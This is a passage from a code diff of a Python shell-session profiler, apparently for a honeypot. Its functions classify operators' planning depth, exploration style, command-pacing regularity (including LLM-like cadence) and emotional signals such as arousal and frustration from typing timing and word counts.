    distinct tools is genuinely a moderate-vocabulary signal.
    """
    if not ctx.commands:
        return
    distinct = len({c.first_token_hash for c in ctx.commands})
    if distinct <= TOOL_VOCAB_NARROW_MAX:
        value = "narrow"
    elif distinct >= TOOL_VOCAB_BROAD_MIN:
        value = "broad"
    else:
        value = "moderate"
    if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        confidence = 0.70
    yield make_observation(
        ctx,
        primitive="cognitive.tool_vocabulary",
        value=value,
        confidence=confidence,
    )


def planning_depth(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.planning_depth`` ∈ {deep, shallow, reactive}.

    Read off the distribution of inter-command IATs:

    * **deep**: many think-pauses (> ``IKI_THINK_MAX_S``). The
      operator stops to think between commands.
    * **reactive**: most pauses are sub-instant
      (≤ ``INTER_CMD_INSTANT_MAX``). Knee-jerk pacing, as from an
      automated runner, a prepared playbook, or an LLM with no
      internal latency.
    * **shallow**: neither; mostly typing-speed pauses, no extended
      contemplation.

    Skip emission when no inter-command IATs exist (one or zero
    commands); the registry has no ``unknown`` for this primitive.
    """
    iats = ctx.inter_cmd_iats
    if not iats:
        return
    n = len(iats)
    deep_count = sum(1 for x in iats if x > IKI_THINK_MAX_S)
    reactive_count = sum(1 for x in iats if x <= INTER_CMD_INSTANT_MAX)
    deep_frac = deep_count / n
    reactive_frac = reactive_count / n
    if deep_frac >= PLANNING_DEEP_MIN:
        value = "deep"
    elif reactive_frac >= PLANNING_REACTIVE_MIN:
        value = "reactive"
    else:
        value = "shallow"
    if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        confidence = 0.65
    yield make_observation(
        ctx,
        primitive="cognitive.planning_depth",
        value=value,
        confidence=confidence,
    )


def exploration_style(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.exploration_style`` ∈ {methodical, chaotic, targeted}.

    Two-axis classification over the first_token_hash sequence:

    * **methodical**: low repetition, low backtracks. Operator marches
      forward through new tools.
    * **targeted**: high repetition (R ≥ EXPLORATION_TARGETED_REP_MIN).
      Same tool re-invoked repeatedly; the operator is drilling.
    * **chaotic**: high backtrack rate (J ≥ EXPLORATION_CHAOTIC_BACKTRACK_MIN).
      Jumps among previously-used tools without a clear thread.

    The backtrack test runs first, so a session that meets both
    thresholds is reported as ``chaotic``.

    The registry doesn't permit ``unknown``; below the
    MIN_COMMANDS_FOR_FULL_CONFIDENCE floor we emit at confidence 0.40
    rather than skip, because the engine has *some* signal, just less
    of it. Skip emission only when there are no commands at all.
    """
    n = len(ctx.commands)
    if n == 0:
        return
    hashes = [c.first_token_hash for c in ctx.commands]
    unique = len(set(hashes))
    # n > 0 is guaranteed by the early return above.
    repetition_rate = 1.0 - (unique / n)
    # Backtrack: at position i, hashes[i] previously seen at index < i-1
    # and not equal to hashes[i-1]. (Repeating the immediate predecessor
    # is "drilling", picked up by repetition_rate; backtrack is the
    # non-local jump signal.)
    seen_before: set[str] = {hashes[0]}
    backtracks = 0
    transitions = 0
    for i in range(1, n):
        transitions += 1
        if hashes[i] != hashes[i - 1] and hashes[i] in seen_before:
            backtracks += 1
        seen_before.add(hashes[i])
    backtrack_rate = (backtracks / transitions) if transitions else 0.0
    if backtrack_rate >= EXPLORATION_CHAOTIC_BACKTRACK_MIN:
        value = "chaotic"
    elif repetition_rate >= EXPLORATION_TARGETED_REP_MIN:
        value = "targeted"
    else:
        value = "methodical"
    if n < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        confidence = 0.60
    yield make_observation(
        ctx,
        primitive="cognitive.exploration_style",
        value=value,
        confidence=confidence,
    )


def cognitive_load(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.cognitive_load`` ∈ {low, medium, high}.

    Composite of three [0, 1]-clipped sub-signals, mean-aggregated:

    * **chunking**: median CV of intra-command IATs / reference CV.
      Fragmented mid-command typing → high contribution.
    * **errors**: fraction of commands whose post-execution output
      matched a canonical error fingerprint (``Command.errored`` from
      Step D.0). Failures pile load.
    * **pace variability**: CV of inter-command IATs / reference CV.
      A spread of think-pause durations → unsettled cadence → load.

    Components with missing data are left out of the mean rather than
    counted as 0.0: the composite normalises by the *available*
    component count, so a session with zero inter-command pauses isn't
    punished for the silence. The error component is always available.
    Skip emission entirely when no commands at all exist, since there
    is no honest answer.

    v0.1 thresholds; D.8 re-tunes once the rest of Phase D is stable.
    """
    if not ctx.commands:
        return
    # Component A: chunking variance (median within-command CV)
    per_cmd_cvs: list[float] = []
    for cmd_iats in ctx.intra_command_iats:
        cv = _cv(cmd_iats)
        if cv is not None:
            per_cmd_cvs.append(cv)
    if per_cmd_cvs:
        chunking_load: float | None = _clip01(
            statistics.median(per_cmd_cvs) / COGNITIVE_LOAD_CHUNKING_REF_CV
        )
    else:
        chunking_load = None
    # Component B: error rate
    error_load: float = sum(1 for c in ctx.commands if c.errored) / len(ctx.commands)
    error_load = _clip01(error_load)
    # Component C: pace variability (CV of inter-command IATs)
    pace_cv = _cv(ctx.inter_cmd_iats)
    if pace_cv is not None:
        pace_load: float | None = _clip01(pace_cv / COGNITIVE_LOAD_PACE_REF_CV)
    else:
        pace_load = None
    components = [c for c in (chunking_load, error_load, pace_load) if c is not None]
    if not components:
        return
    load = sum(components) / len(components)
    if load < COGNITIVE_LOAD_LOW_MAX:
        value = "low"
    elif load < COGNITIVE_LOAD_MEDIUM_MAX:
        value = "medium"
    else:
        value = "high"
    if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        # Composite over three soft sub-signals, held below the
        # cap of single-source primitives. D.8 re-tunes.
        confidence = 0.60
    yield make_observation(
        ctx,
        primitive="cognitive.cognitive_load",
        value=value,
        confidence=confidence,
    )


def inter_command_consistency(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.inter_command_consistency``.

    CV (stdev / mean) of inter-command IATs.

    * ``metronomic`` (CV < 0.40) → LLM-pure. Empirical anchor:
      LLM-simulated session CV ≈ 0.24 in this corpus.
    * ``variable`` (0.40 ≤ CV < 1.50) → human. Empirical anchor:
      human session CV ≈ 0.94.
    * ``bimodal`` (CV ≥ 1.50) → LLM-assisted human, heuristic. v0.1
      uses CV-only; true bimodal detection (Hartigan dip / two-peak)
      is filed for v0.2 per the registry's ``notes:`` field.
    """
    iats = ctx.inter_cmd_iats
    if len(iats) < 2:
        return
    mean = statistics.fmean(iats)
    if mean <= 0.0:
        return
    cv = statistics.stdev(iats) / mean
    if cv < PAUSE_CV_METRONOMIC_MAX:
        value = "metronomic"
    elif cv >= PAUSE_CV_BIMODAL_MIN:
        value = "bimodal"
    else:
        value = "variable"
    confidence = (
        0.40 if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE else 0.75
    )
    yield make_observation(
        ctx,
        primitive="cognitive.inter_command_consistency",
        value=value,
        confidence=confidence,
    )
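
The CV bucketing described in `inter_command_consistency` can be sketched in isolation. This is an illustration only: the two thresholds are copied from the numbers quoted in the docstring (0.40 and 1.50), the authoritative values live in `_thresholds` and may differ, and `classify_pause_cv` is a hypothetical name that returns a plain string instead of yielding an `Observation`.

```python
import statistics

# Assumed values, taken from the docstring; the real constants are
# imported from _thresholds and are not shown in this diff.
PAUSE_CV_METRONOMIC_MAX = 0.40
PAUSE_CV_BIMODAL_MIN = 1.50


def classify_pause_cv(iats):
    """Return the consistency bucket, or None when the CV is undefined."""
    if len(iats) < 2:
        return None
    mean = statistics.fmean(iats)
    if mean <= 0.0:
        return None
    cv = statistics.stdev(iats) / mean
    if cv < PAUSE_CV_METRONOMIC_MAX:
        return "metronomic"
    if cv >= PAUSE_CV_BIMODAL_MIN:
        return "bimodal"
    return "variable"


# Near-constant pauses, a moderate spread, and one long pause among short ones.
steady = classify_pause_cv([2.0, 2.1, 1.9, 2.0])
mixed = classify_pause_cv([1.0, 2.0, 4.0, 1.5, 3.5])
spiky = classify_pause_cv([0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 30.0])
```

A single very long pause among short ones is enough to push the CV past the upper threshold, which is why the docstring calls the `bimodal` label a heuristic rather than a true two-peak test.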


@@ -0,0 +1,223 @@
"""``emotional_valence.*`` feature functions (Phase G, soft block).
All four primitives in this module ride a hard 0.5 confidence cap
(:data:`EMOTIONAL_VALENCE_CONFIDENCE_CAP`). Cap is enforced inside
the feature functions, *not* via :func:`make_observation` — sample-size
honesty may still pull confidence below 0.5.
Step G.5: ``emotional_valence.valence``.
Step G.6: ``emotional_valence.arousal``.
Step G.7: ``emotional_valence.stress_response``.
Step G.8: ``emotional_valence.frustration_venting``.
"""
from __future__ import annotations
import statistics
from typing import Iterator
from behave_core.spec.envelope import Observation
from decnet.profiler.behave_shell._ctx import SessionContext
from decnet.profiler.behave_shell._features._emit import make_observation
from decnet.profiler.behave_shell._thresholds import (
AROUSAL_BANG_RUN_MIN,
AROUSAL_CALM_IAT_S,
AROUSAL_CAPS_RUN_MIN,
AROUSAL_FAST_IAT_S,
AROUSAL_MIN_IATS,
EMOTIONAL_VALENCE_CONFIDENCE_CAP,
FRUST_VENT_FULL_CONFIDENCE_MIN,
FRUST_VENT_MIN_TYPED_CHARS,
STRESS_DISTRESS_RATIO_MIN,
STRESS_EUSTRESS_RATIO_MIN,
STRESS_MIN_ERRORED_WITH_IATS,
VALENCE_FULL_CONFIDENCE_MIN,
VALENCE_MIN_HITS,
VALENCE_MIN_TYPED_CHARS,
)


def _cap_soft(c: float) -> float:
    """Clamp confidence to the soft-primitive ceiling."""
    return min(c, EMOTIONAL_VALENCE_CONFIDENCE_CAP)


def valence(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.valence`` ∈ {positive, neutral, negative}.

    Pure ratio over the lexical counters built in G.0:

    * ``positive``: ``positive_lex_hits > negative_lex_hits +
      obscenity_hits`` AND ``positive_lex_hits ≥ VALENCE_MIN_HITS`` (2).
    * ``negative``: ``negative_lex_hits + obscenity_hits >
      positive_lex_hits`` AND that sum ≥ ``VALENCE_MIN_HITS``.
    * ``neutral``: fall-through.

    Skip emission below ``VALENCE_MIN_TYPED_CHARS`` (80) typed letters.
    Confidence hard-capped at 0.50 (registry convention); 0.30 below
    ``VALENCE_FULL_CONFIDENCE_MIN`` (200).
    """
    if ctx.typed_letter_count < VALENCE_MIN_TYPED_CHARS:
        return
    pos = ctx.positive_lex_hits
    neg_total = ctx.negative_lex_hits + ctx.obscenity_hits
    if pos > neg_total and pos >= VALENCE_MIN_HITS:
        value = "positive"
    elif neg_total > pos and neg_total >= VALENCE_MIN_HITS:
        value = "negative"
    else:
        value = "neutral"
    raw = 0.50 if ctx.typed_letter_count >= VALENCE_FULL_CONFIDENCE_MIN else 0.30
    yield make_observation(
        ctx,
        primitive="emotional_valence.valence",
        value=value,
        confidence=_cap_soft(raw),
    )


def arousal(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.arousal`` ∈ {low_calm, medium_engaged,
    high_agitated}.

    A typing burst qualifies when it holds at least 3 IATs. Three
    signals (any of which fires ``high_agitated``):

    * ``ctx.caps_run_max ≥ AROUSAL_CAPS_RUN_MIN`` (5): capslock rant.
    * ``ctx.bang_run_max ≥ AROUSAL_BANG_RUN_MIN`` (3): repeated bangs.
    * The fastest qualifying burst's median IAT < ``AROUSAL_FAST_IAT_S``
      (0.06), provided the qualifying bursts together hold
      ≥ ``AROUSAL_MIN_IATS`` (30) IATs.

    ``low_calm``: slowest qualifying burst's median IAT >
    ``AROUSAL_CALM_IAT_S`` (0.30), under the same total-IAT requirement.
    ``medium_engaged``: fall-through.

    Skip emission when no typing burst qualifies. Confidence hard-
    capped at 0.50; 0.30 when the qualifying bursts hold fewer than
    ``AROUSAL_MIN_IATS`` IATs in total.
    """
    qualifying = [b for b in ctx.typing_bursts if len(b) >= 3]
    if not qualifying:
        return
    fastest_med = min(statistics.median(b) for b in qualifying)
    slowest_med = max(statistics.median(b) for b in qualifying)
    total_iats = sum(len(b) for b in qualifying)
    if (
        ctx.caps_run_max >= AROUSAL_CAPS_RUN_MIN
        or ctx.bang_run_max >= AROUSAL_BANG_RUN_MIN
        or (
            total_iats >= AROUSAL_MIN_IATS
            and fastest_med < AROUSAL_FAST_IAT_S
        )
    ):
        value = "high_agitated"
    elif total_iats >= AROUSAL_MIN_IATS and slowest_med > AROUSAL_CALM_IAT_S:
        value = "low_calm"
    else:
        value = "medium_engaged"
    raw = 0.50 if total_iats >= AROUSAL_MIN_IATS else 0.30
    yield make_observation(
        ctx,
        primitive="emotional_valence.arousal",
        value=value,
        confidence=_cap_soft(raw),
    )


def stress_response(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.stress_response`` ∈ {none,
    eustress_positive, distress_negative}.

    Compare typing speed *after* an errored command vs the session
    baseline:

    * For each errored command at index ``i``, gather
      ``ctx.intra_command_iats[i+1]``, the response command's intra-
      command IATs.
    * Baseline: median of all intra-command IATs from commands NOT
      immediately following an errored command.

    Verdict by ratio of post-error / baseline:

    * ratio ≥ ``STRESS_EUSTRESS_RATIO_MIN`` (1.20) → ``eustress_positive``
      (slowed down: recovered, deliberate).
    * ratio ≤ ``1 / STRESS_DISTRESS_RATIO_MIN`` → ``distress_negative``
      (sped up: anxious, mashing keys).
    * otherwise → ``none``.

    Skip emission when no commands. With no post-error or no baseline
    IATs the verdict is ``none``. Confidence hard-capped at 0.50;
    0.30 below ``STRESS_MIN_ERRORED_WITH_IATS`` (2) errored commands
    with non-empty post-error IAT data.
    """
    if not ctx.commands:
        return
    post_error_iats: list[float] = []
    baseline_iats: list[float] = []
    qualifying_errored = 0
    for i in range(len(ctx.commands)):
        is_post_error = i > 0 and ctx.commands[i - 1].errored
        iats = (
            list(ctx.intra_command_iats[i])
            if i < len(ctx.intra_command_iats)
            else []
        )
        if is_post_error:
            if iats:
                qualifying_errored += 1
                post_error_iats.extend(iats)
        else:
            baseline_iats.extend(iats)
    if not post_error_iats or not baseline_iats:
        value = "none"
    else:
        med_post = statistics.median(post_error_iats)
        med_base = statistics.median(baseline_iats)
        if med_base <= 0.0:
            value = "none"
        else:
            ratio = med_post / med_base
            if ratio >= STRESS_EUSTRESS_RATIO_MIN:
                value = "eustress_positive"
            elif ratio <= 1.0 / STRESS_DISTRESS_RATIO_MIN:
                value = "distress_negative"
            else:
                value = "none"
    raw = 0.50 if qualifying_errored >= STRESS_MIN_ERRORED_WITH_IATS else 0.30
    yield make_observation(
        ctx,
        primitive="emotional_valence.stress_response",
        value=value,
        confidence=_cap_soft(raw),
    )


def frustration_venting(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.frustration_venting`` ∈ {none, detected}.

    Pure read of ``ctx.obscenity_hits`` (G.0 lexical counter):

    * ``detected``: ``obscenity_hits ≥ 1``.
    * ``none``: zero hits.

    Skip emission below ``FRUST_VENT_MIN_TYPED_CHARS`` (30) typed
    letters, which is too thin to call cleanly absent. Confidence
    hard-capped at 0.50; 0.40 when ``detected``; 0.50 only when
    ``none`` AND typed_letter_count ≥ ``FRUST_VENT_FULL_CONFIDENCE_MIN``
    (200); 0.30 otherwise.
    """
    if ctx.typed_letter_count < FRUST_VENT_MIN_TYPED_CHARS:
        return
    if ctx.obscenity_hits >= 1:
        value = "detected"
        raw = 0.40
    else:
        value = "none"
        if ctx.typed_letter_count >= FRUST_VENT_FULL_CONFIDENCE_MIN:
            raw = 0.50
        else:
            raw = 0.30
    yield make_observation(
        ctx,
        primitive="emotional_valence.frustration_venting",
        value=value,
        confidence=_cap_soft(raw),
    )
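
The confidence ladder and soft cap used by `frustration_venting` can be exercised without the rest of the engine. In this sketch the three constants carry the values quoted in the docstrings (cap 0.50, floors 30 and 200); they are assumptions here, since `_thresholds` is not shown in this diff. `venting_verdict` is a hypothetical helper that takes the two counters directly and returns a tuple instead of yielding an `Observation`.

```python
# Assumed values, taken from the docstrings above.
EMOTIONAL_VALENCE_CONFIDENCE_CAP = 0.50
FRUST_VENT_MIN_TYPED_CHARS = 30
FRUST_VENT_FULL_CONFIDENCE_MIN = 200


def venting_verdict(typed_letter_count, obscenity_hits):
    """Return (value, confidence), or None when the session is too thin."""
    if typed_letter_count < FRUST_VENT_MIN_TYPED_CHARS:
        return None
    if obscenity_hits >= 1:
        value, raw = "detected", 0.40
    elif typed_letter_count >= FRUST_VENT_FULL_CONFIDENCE_MIN:
        value, raw = "none", 0.50
    else:
        value, raw = "none", 0.30
    # The cap is applied last, so no branch can exceed the ceiling.
    return value, min(raw, EMOTIONAL_VALENCE_CONFIDENCE_CAP)


thin = venting_verdict(12, 0)
short_clean = venting_verdict(80, 0)
long_clean = venting_verdict(450, 0)
venting = venting_verdict(450, 3)
```

Applying the cap at the call site, as the module does with `_cap_soft`, keeps `make_observation` generic while still guaranteeing that no soft primitive reports more than the ceiling.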

Some files were not shown because too many files have changed in this diff